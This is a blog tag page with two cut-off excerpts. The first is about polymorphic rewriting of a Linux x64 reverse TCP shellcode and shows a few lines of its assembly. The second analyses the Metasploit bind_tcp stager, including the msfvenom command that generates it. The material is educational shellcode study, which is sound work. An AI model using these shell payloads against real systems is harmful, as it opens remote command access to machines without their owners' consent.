This blog post shows polymorphic transformation of three Linux Intel x64 shellcodes. 1. Dynamic null-free reverse TCP shell Link to original shellcode: http://shell-storm.org/shellcode/files/shellcode-907.php Original shellcode with analysis push byte 41 pop rax ; syscall number 41, int socket(int domain, int type, int protocol) cdq ; zeroing RDX via sign extension push byte 2 pop rdi ; RDI = 2, int …
Tag: bind
Analysis of Metasploit linux/x64/shell/bind_tcp shellcode
linux/x64/shell/bind_tcp staged shellcode generally consists of following steps Create listening port and wait for connection Map 4096 bytes in process’ VAS memory Wait for incoming data and save them into mapped memory Execute saved data Shellcode demonstration Create elf64 executable with msfvenom $ msfvenom -p linux/x64/shell/bind_tcp -f elf -a x64 –platform linux LPORT=1234 -o staged_bind_tcp_x64 Execute the stager $ chmod …